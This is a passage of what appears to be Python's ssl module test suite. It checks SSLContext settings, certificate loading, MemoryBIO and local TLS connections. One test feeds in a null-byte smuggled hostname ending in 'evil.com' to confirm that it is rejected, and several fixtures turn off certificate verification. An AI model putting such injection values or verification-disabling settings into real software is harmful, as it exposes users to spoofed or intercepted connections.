self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
with self.assertRaises(TypeError):
ctx.verify_mode = None
with self.assertRaises(ValueError):
ctx.verify_mode = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
def test_hostname_checks_common_name(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.hostname_checks_common_name)
if ssl.HAS_NEVER_CHECK_COMMON_NAME:
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = False
self.assertFalse(ctx.hostname_checks_common_name)
ctx.hostname_checks_common_name = True
self.assertTrue(ctx.hostname_checks_common_name)
else:
with self.assertRaises(AttributeError):
ctx.hostname_checks_common_name = True
@unittest.skipUnless(hasattr(ssl.SSLContext, 'minimum_version'),
"required OpenSSL 1.1.0g")
def test_min_max_version(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# OpenSSL default is MINIMUM_SUPPORTED, however some vendors like
# Fedora override the setting to TLS 1.0.
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.MINIMUM_SUPPORTED,
# Fedora 29 uses TLS 1.0 by default
ssl.TLSVersion.TLSv1,
# RHEL 8 uses TLS 1.2 by default
ssl.TLSVersion.TLSv1_2}
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.minimum_version = ssl.TLSVersion.TLSv1_1
ctx.maximum_version = ssl.TLSVersion.TLSv1_2
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.TLSv1_1
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1_2
)
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
ctx.maximum_version = ssl.TLSVersion.TLSv1
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.TLSv1
)
ctx.maximum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
ctx.maximum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
self.assertIn(
ctx.maximum_version,
{ssl.TLSVersion.TLSv1, ssl.TLSVersion.SSLv3}
)
ctx.minimum_version = ssl.TLSVersion.MAXIMUM_SUPPORTED
self.assertIn(
ctx.minimum_version,
{ssl.TLSVersion.TLSv1_2, ssl.TLSVersion.TLSv1_3}
)
with self.assertRaises(ValueError):
ctx.minimum_version = 42
ctx = ssl.SSLContext(ssl.PROTOCOL_TLSv1_1)
self.assertEqual(
ctx.minimum_version, ssl.TLSVersion.MINIMUM_SUPPORTED
)
self.assertEqual(
ctx.maximum_version, ssl.TLSVersion.MAXIMUM_SUPPORTED
)
with self.assertRaises(ValueError):
ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED
with self.assertRaises(ValueError):
ctx.maximum_version = ssl.TLSVersion.TLSv1
@unittest.skipUnless(have_verify_flags(),
"verify_flags need OpenSSL > 0.9.8")
def test_verify_flags(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# default value
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT | tf)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_LEAF)
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_CHAIN
self.assertEqual(ctx.verify_flags, ssl.VERIFY_CRL_CHECK_CHAIN)
ctx.verify_flags = ssl.VERIFY_DEFAULT
self.assertEqual(ctx.verify_flags, ssl.VERIFY_DEFAULT)
# supports any value
ctx.verify_flags = ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT
self.assertEqual(ctx.verify_flags,
ssl.VERIFY_CRL_CHECK_LEAF | ssl.VERIFY_X509_STRICT)
with self.assertRaises(TypeError):
ctx.verify_flags = None
def test_load_cert_chain(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# Combined key and cert in a single file
ctx.load_cert_chain(CERTFILE, keyfile=None)
ctx.load_cert_chain(CERTFILE, keyfile=CERTFILE)
self.assertRaises(TypeError, ctx.load_cert_chain, keyfile=CERTFILE)
with self.assertRaises(OSError) as cm:
ctx.load_cert_chain(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(BADCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(EMPTYCERT)
# Separate key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_cert_chain(ONLYCERT, ONLYKEY)
ctx.load_cert_chain(certfile=ONLYCERT, keyfile=ONLYKEY)
ctx.load_cert_chain(certfile=BYTES_ONLYCERT, keyfile=BYTES_ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYCERT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(ONLYKEY)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_cert_chain(certfile=ONLYKEY, keyfile=ONLYCERT)
# Mismatching key and cert
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
with self.assertRaisesRegex(ssl.SSLError, "key values mismatch"):
ctx.load_cert_chain(CAFILE_CACERT, ONLYKEY)
# Password protected key and cert
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=KEY_PASSWORD.encode())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=bytearray(KEY_PASSWORD.encode()))
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD)
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED, KEY_PASSWORD.encode())
ctx.load_cert_chain(ONLYCERT, ONLYKEY_PROTECTED,
bytearray(KEY_PASSWORD.encode()))
with self.assertRaisesRegex(TypeError, "should be a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=True)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password="badpass")
with self.assertRaisesRegex(ValueError, "cannot be longer"):
# openssl has a fixed limit on the password buffer.
# PEM_BUFSIZE is generally set to 1kb.
# Return a string larger than this.
ctx.load_cert_chain(CERTFILE_PROTECTED, password=b'a' * 102400)
# Password callback
def getpass_unicode():
return KEY_PASSWORD
def getpass_bytes():
return KEY_PASSWORD.encode()
def getpass_bytearray():
return bytearray(KEY_PASSWORD.encode())
def getpass_badpass():
return "badpass"
def getpass_huge():
return b'a' * (1024 * 1024)
def getpass_bad_type():
return 9
def getpass_exception():
raise Exception('getpass error')
class GetPassCallable:
def __call__(self):
return KEY_PASSWORD
def getpass(self):
return KEY_PASSWORD
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_unicode)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytes)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bytearray)
ctx.load_cert_chain(CERTFILE_PROTECTED, password=GetPassCallable())
ctx.load_cert_chain(CERTFILE_PROTECTED,
password=GetPassCallable().getpass)
with self.assertRaises(ssl.SSLError):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_badpass)
with self.assertRaisesRegex(ValueError, "cannot be longer"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_huge)
with self.assertRaisesRegex(TypeError, "must return a string"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_bad_type)
with self.assertRaisesRegex(Exception, "getpass error"):
ctx.load_cert_chain(CERTFILE_PROTECTED, password=getpass_exception)
# Make sure the password function isn't called if it isn't needed
ctx.load_cert_chain(CERTFILE, password=getpass_exception)
def test_load_verify_locations(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_verify_locations(CERTFILE)
ctx.load_verify_locations(cafile=CERTFILE, capath=None)
ctx.load_verify_locations(BYTES_CERTFILE)
ctx.load_verify_locations(cafile=BYTES_CERTFILE, capath=None)
self.assertRaises(TypeError, ctx.load_verify_locations)
self.assertRaises(TypeError, ctx.load_verify_locations, None, None, None)
with self.assertRaises(OSError) as cm:
ctx.load_verify_locations(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaisesRegex(ssl.SSLError, "PEM lib"):
ctx.load_verify_locations(BADCERT)
ctx.load_verify_locations(CERTFILE, CAPATH)
ctx.load_verify_locations(CERTFILE, capath=BYTES_CAPATH)
# Issue #10989: crash if the second argument type is invalid
self.assertRaises(TypeError, ctx.load_verify_locations, None, True)
def test_load_verify_cadata(self):
# test cadata
with open(CAFILE_CACERT) as f:
cacert_pem = f.read()
cacert_der = ssl.PEM_cert_to_DER_cert(cacert_pem)
with open(CAFILE_NEURONIO) as f:
neuronio_pem = f.read()
neuronio_der = ssl.PEM_cert_to_DER_cert(neuronio_pem)
# test PEM
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 0)
ctx.load_verify_locations(cadata=cacert_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 1)
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=neuronio_pem)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = "\n".join((cacert_pem, neuronio_pem))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# with junk around the certs
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = ["head", cacert_pem, "other", neuronio_pem, "again",
neuronio_pem, "tail"]
ctx.load_verify_locations(cadata="\n".join(combined))
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# test DER
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_verify_locations(cadata=cacert_der)
ctx.load_verify_locations(cadata=neuronio_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# cert already in hash table
ctx.load_verify_locations(cadata=cacert_der)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# combined
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
combined = b"".join((cacert_der, neuronio_der))
ctx.load_verify_locations(cadata=combined)
self.assertEqual(ctx.cert_store_stats()["x509_ca"], 2)
# error cases
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_verify_locations, cadata=object)
with self.assertRaisesRegex(ssl.SSLError, "no start line"):
ctx.load_verify_locations(cadata="broken")
with self.assertRaisesRegex(ssl.SSLError, "not enough data"):
ctx.load_verify_locations(cadata=b"broken")
def test_load_dh_params(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.load_dh_params(DHFILE)
if os.name != 'nt':
ctx.load_dh_params(BYTES_DHFILE)
self.assertRaises(TypeError, ctx.load_dh_params)
self.assertRaises(TypeError, ctx.load_dh_params, None)
with self.assertRaises(FileNotFoundError) as cm:
ctx.load_dh_params(NONEXISTINGCERT)
self.assertEqual(cm.exception.errno, errno.ENOENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
def test_session_stats(self):
for proto in PROTOCOLS:
ctx = ssl.SSLContext(proto)
self.assertEqual(ctx.session_stats(), {
'number': 0,
'connect': 0,
'connect_good': 0,
'connect_renegotiate': 0,
'accept': 0,
'accept_good': 0,
'accept_renegotiate': 0,
'hits': 0,
'misses': 0,
'timeouts': 0,
'cache_full': 0,
})
def test_set_default_verify_paths(self):
# There's not much we can do to test that it acts as expected,
# so just check it doesn't crash or raise an exception.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.set_default_verify_paths()
@unittest.skipUnless(ssl.HAS_ECDH, "ECDH disabled on this OpenSSL build")
def test_set_ecdh_curve(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.set_ecdh_curve("prime256v1")
ctx.set_ecdh_curve(b"prime256v1")
self.assertRaises(TypeError, ctx.set_ecdh_curve)
self.assertRaises(TypeError, ctx.set_ecdh_curve, None)
self.assertRaises(ValueError, ctx.set_ecdh_curve, "foo")
self.assertRaises(ValueError, ctx.set_ecdh_curve, b"foo")
@needs_sni
def test_sni_callback(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# set_servername_callback expects a callable, or None
self.assertRaises(TypeError, ctx.set_servername_callback)
self.assertRaises(TypeError, ctx.set_servername_callback, 4)
self.assertRaises(TypeError, ctx.set_servername_callback, "")
self.assertRaises(TypeError, ctx.set_servername_callback, ctx)
def dummycallback(sock, servername, ctx):
pass
ctx.set_servername_callback(None)
ctx.set_servername_callback(dummycallback)
@needs_sni
def test_sni_callback_refcycle(self):
# Reference cycles through the servername callback are detected
# and cleared.
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
def dummycallback(sock, servername, ctx, cycle=ctx):
pass
ctx.set_servername_callback(dummycallback)
wr = weakref.ref(ctx)
del ctx, dummycallback
gc.collect()
self.assertIs(wr(), None)
def test_cert_store_stats(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_cert_chain(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 0})
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 0, 'crl': 0, 'x509': 1})
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.cert_store_stats(),
{'x509_ca': 1, 'crl': 0, 'x509': 2})
def test_get_ca_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertEqual(ctx.get_ca_certs(), [])
# CERTFILE is not flagged as X509v3 Basic Constraints: CA:TRUE
ctx.load_verify_locations(CERTFILE)
self.assertEqual(ctx.get_ca_certs(), [])
# but CAFILE_CACERT is a CA cert
ctx.load_verify_locations(CAFILE_CACERT)
self.assertEqual(ctx.get_ca_certs(),
[{'issuer': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'notAfter': asn1time('Mar 29 12:29:49 2033 GMT'),
'notBefore': asn1time('Mar 30 12:29:49 2003 GMT'),
'serialNumber': '00',
'crlDistributionPoints': ('https://www.cacert.org/revoke.crl',),
'subject': ((('organizationName', 'Root CA'),),
(('organizationalUnitName', 'http://www.cacert.org'),),
(('commonName', 'CA Cert Signing Authority'),),
(('emailAddress', '[email protected]'),)),
'version': 3}])
with open(CAFILE_CACERT) as f:
pem = f.read()
der = ssl.PEM_cert_to_DER_cert(pem)
self.assertEqual(ctx.get_ca_certs(True), [der])
def test_load_default_certs(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.SERVER_AUTH)
ctx.load_default_certs()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs(ssl.Purpose.CLIENT_AUTH)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertRaises(TypeError, ctx.load_default_certs, None)
self.assertRaises(TypeError, ctx.load_default_certs, 'SERVER_AUTH')
@unittest.skipIf(sys.platform == "win32", "not-Windows specific")
@unittest.skipIf(IS_LIBRESSL, "LibreSSL doesn't support env vars")
def test_load_default_certs_env(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
self.assertEqual(ctx.cert_store_stats(), {"crl": 0, "x509": 1, "x509_ca": 0})
@unittest.skipUnless(sys.platform == "win32", "Windows specific")
@unittest.skipIf(hasattr(sys, "gettotalrefcount"), "Debug build does not share environment between CRTs")
def test_load_default_certs_env_windows(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.load_default_certs()
stats = ctx.cert_store_stats()
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with support.EnvironmentVarGuard() as env:
env["SSL_CERT_DIR"] = CAPATH
env["SSL_CERT_FILE"] = CERTFILE
ctx.load_default_certs()
stats["x509"] += 1
self.assertEqual(ctx.cert_store_stats(), stats)
def _assert_context_options(self, ctx):
self.assertEqual(ctx.options & ssl.OP_NO_SSLv2, ssl.OP_NO_SSLv2)
if OP_NO_COMPRESSION != 0:
self.assertEqual(ctx.options & OP_NO_COMPRESSION,
OP_NO_COMPRESSION)
if OP_SINGLE_DH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_DH_USE,
OP_SINGLE_DH_USE)
if OP_SINGLE_ECDH_USE != 0:
self.assertEqual(ctx.options & OP_SINGLE_ECDH_USE,
OP_SINGLE_ECDH_USE)
if OP_CIPHER_SERVER_PREFERENCE != 0:
self.assertEqual(ctx.options & OP_CIPHER_SERVER_PREFERENCE,
OP_CIPHER_SERVER_PREFERENCE)
def test_create_default_context(self):
ctx = ssl.create_default_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
with open(SIGNING_CA) as f:
cadata = f.read()
ctx = ssl.create_default_context(cafile=SIGNING_CA, capath=CAPATH,
cadata=cadata)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self._assert_context_options(ctx)
ctx = ssl.create_default_context(ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test__create_stdlib_context(self):
ctx = ssl._create_stdlib_context()
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self.assertFalse(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(ssl.PROTOCOL_TLSv1,
cert_reqs=ssl.CERT_REQUIRED,
check_hostname=True)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLSv1)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
self.assertTrue(ctx.check_hostname)
self._assert_context_options(ctx)
ctx = ssl._create_stdlib_context(purpose=ssl.Purpose.CLIENT_AUTH)
self.assertEqual(ctx.protocol, ssl.PROTOCOL_TLS)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
self._assert_context_options(ctx)
def test_check_hostname(self):
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set CERT_REQUIRED
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_REQUIRED
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# Changing verify_mode does not affect check_hostname
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
# Auto set
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_OPTIONAL
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# keep CERT_OPTIONAL
ctx.check_hostname = True
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_OPTIONAL)
# Cannot set CERT_NONE with check_hostname enabled
with self.assertRaises(ValueError):
ctx.verify_mode = ssl.CERT_NONE
ctx.check_hostname = False
self.assertFalse(ctx.check_hostname)
ctx.verify_mode = ssl.CERT_NONE
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_client_server(self):
# PROTOCOL_TLS_CLIENT has sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
self.assertTrue(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_REQUIRED)
# PROTOCOL_TLS_SERVER has different but also sane defaults
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
self.assertFalse(ctx.check_hostname)
self.assertEqual(ctx.verify_mode, ssl.CERT_NONE)
def test_context_custom_class(self):
class MySSLSocket(ssl.SSLSocket):
pass
class MySSLObject(ssl.SSLObject):
pass
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
ctx.sslsocket_class = MySSLSocket
ctx.sslobject_class = MySSLObject
with ctx.wrap_socket(socket.socket(), server_side=True) as sock:
self.assertIsInstance(sock, MySSLSocket)
obj = ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO())
self.assertIsInstance(obj, MySSLObject)
class SSLErrorTests(unittest.TestCase):
def test_str(self):
# The str() of a SSLError doesn't include the errno
e = ssl.SSLError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
# Same for a subclass
e = ssl.SSLZeroReturnError(1, "foo")
self.assertEqual(str(e), "foo")
self.assertEqual(e.errno, 1)
def test_lib_reason(self):
# Test the library and reason attributes
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
with self.assertRaises(ssl.SSLError) as cm:
ctx.load_dh_params(CERTFILE)
self.assertEqual(cm.exception.library, 'PEM')
self.assertEqual(cm.exception.reason, 'NO_START_LINE')
s = str(cm.exception)
self.assertTrue(s.startswith("[PEM: NO_START_LINE] no start line"), s)
def test_subclass(self):
# Check that the appropriate SSLError subclass is raised
# (this only tests one of them)
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
ctx.check_hostname = False
ctx.verify_mode = ssl.CERT_NONE
with socket.create_server(("127.0.0.1", 0)) as s:
c = socket.create_connection(s.getsockname())
c.setblocking(False)
with ctx.wrap_socket(c, False, do_handshake_on_connect=False) as c:
with self.assertRaises(ssl.SSLWantReadError) as cm:
c.do_handshake()
s = str(cm.exception)
self.assertTrue(s.startswith("The operation did not complete (read)"), s)
# For compatibility
self.assertEqual(cm.exception.errno, ssl.SSL_ERROR_WANT_READ)
def test_bad_server_hostname(self):
ctx = ssl.create_default_context()
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="")
with self.assertRaises(ValueError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname=".example.org")
with self.assertRaises(TypeError):
ctx.wrap_bio(ssl.MemoryBIO(), ssl.MemoryBIO(),
server_hostname="example.org\x00evil.com")
class MemoryBIOTests(unittest.TestCase):
def test_read_write(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
self.assertEqual(bio.read(), b'')
bio.write(b'foo')
bio.write(b'bar')
self.assertEqual(bio.read(), b'foobar')
self.assertEqual(bio.read(), b'')
bio.write(b'baz')
self.assertEqual(bio.read(2), b'ba')
self.assertEqual(bio.read(1), b'z')
self.assertEqual(bio.read(1), b'')
def test_eof(self):
bio = ssl.MemoryBIO()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertFalse(bio.eof)
bio.write(b'foo')
self.assertFalse(bio.eof)
bio.write_eof()
self.assertFalse(bio.eof)
self.assertEqual(bio.read(2), b'fo')
self.assertFalse(bio.eof)
self.assertEqual(bio.read(1), b'o')
self.assertTrue(bio.eof)
self.assertEqual(bio.read(), b'')
self.assertTrue(bio.eof)
def test_pending(self):
bio = ssl.MemoryBIO()
self.assertEqual(bio.pending, 0)
bio.write(b'foo')
self.assertEqual(bio.pending, 3)
for i in range(3):
bio.read(1)
self.assertEqual(bio.pending, 3-i-1)
for i in range(3):
bio.write(b'x')
self.assertEqual(bio.pending, i+1)
bio.read()
self.assertEqual(bio.pending, 0)
def test_buffer_types(self):
bio = ssl.MemoryBIO()
bio.write(b'foo')
self.assertEqual(bio.read(), b'foo')
bio.write(bytearray(b'bar'))
self.assertEqual(bio.read(), b'bar')
bio.write(memoryview(b'baz'))
self.assertEqual(bio.read(), b'baz')
def test_error_types(self):
bio = ssl.MemoryBIO()
self.assertRaises(TypeError, bio.write, 'foo')
self.assertRaises(TypeError, bio.write, None)
self.assertRaises(TypeError, bio.write, True)
self.assertRaises(TypeError, bio.write, 1)
class SSLObjectTests(unittest.TestCase):
def test_private_init(self):
bio = ssl.MemoryBIO()
with self.assertRaisesRegex(TypeError, "public constructor"):
ssl.SSLObject(bio, bio)
def test_unwrap(self):
client_ctx, server_ctx, hostname = testing_context()
c_in = ssl.MemoryBIO()
c_out = ssl.MemoryBIO()
s_in = ssl.MemoryBIO()
s_out = ssl.MemoryBIO()
client = client_ctx.wrap_bio(c_in, c_out, server_hostname=hostname)
server = server_ctx.wrap_bio(s_in, s_out, server_side=True)
# Loop on the handshake for a bit to get it settled
for _ in range(5):
try:
client.do_handshake()
except ssl.SSLWantReadError:
pass
if c_out.pending:
s_in.write(c_out.read())
try:
server.do_handshake()
except ssl.SSLWantReadError:
pass
if s_out.pending:
c_in.write(s_out.read())
# Now the handshakes should be complete (don't raise WantReadError)
client.do_handshake()
server.do_handshake()
# Now if we unwrap one side unilaterally, it should send close-notify
# and raise WantReadError:
with self.assertRaises(ssl.SSLWantReadError):
client.unwrap()
# But server.unwrap() does not raise, because it reads the client's
# close-notify:
s_in.write(c_out.read())
server.unwrap()
# And now that the client gets the server's close-notify, it doesn't
# raise either.
c_in.write(s_out.read())
client.unwrap()
class SimpleBackgroundTests(unittest.TestCase):
"""Tests that connect to a simple server running in the background"""
def setUp(self):
server = ThreadedEchoServer(SIGNED_CERTFILE)
self.server_addr = (HOST, server.port)
server.__enter__()
self.addCleanup(server.__exit__, None, None, None)
def test_connect(self):
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_NONE) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
self.assertFalse(s.server_side)
# this should succeed because we specify the root cert
with test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA) as s:
s.connect(self.server_addr)
self.assertTrue(s.getpeercert())
self.assertFalse(s.server_side)
def test_connect_fail(self):
# This should fail because we have no verification certs. Connection
# failure crashes ThreadedEchoServer, so run this in an independent
# test method.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED)
self.addCleanup(s.close)
self.assertRaisesRegex(ssl.SSLError, "certificate verify failed",
s.connect, self.server_addr)
def test_connect_ex(self):
# Issue #11326: check connect_ex() implementation
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA)
self.addCleanup(s.close)
self.assertEqual(0, s.connect_ex(self.server_addr))
self.assertTrue(s.getpeercert())
def test_non_blocking_connect_ex(self):
# Issue #11326: non-blocking connect_ex() should allow handshake
# to proceed after the socket gets ready.
s = test_wrap_socket(socket.socket(socket.AF_INET),
cert_reqs=ssl.CERT_REQUIRED,
ca_certs=SIGNING_CA,
do_handshake_on_connect=False)
self.addCleanup(s.close)
s.setblocking(False)
rc = s.connect_ex(self.server_addr)
# EWOULDBLOCK under Windows, EINPROGRESS elsewhere
self.assertIn(rc, (0, errno.EINPROGRESS, errno.EWOULDBLOCK))
# Wait for connect to finish
select.select([], [s], [], 5.0)
# Non-blocking handshake
while True:
try:
s.do_handshake()
break
except ssl.SSLWantReadError:
select.select([s], [], [], 5.0)
except ssl.SSLWantWriteError:
select.select([], [s], [], 5.0)
# SSL established
self.assertTrue(s.getpeercert())
def test_connect_with_context(self):
# Same as test_connect, but with a separately created context
ctx = ssl.SSLContext(ssl.PROTOCOL_TLS)
with ctx.wrap_socket(socket.socket(socket.AF_INET)) as s:
s.connect(self.server_addr)
self.assertEqual({}, s.getpeercert())
# Same with a server hostname
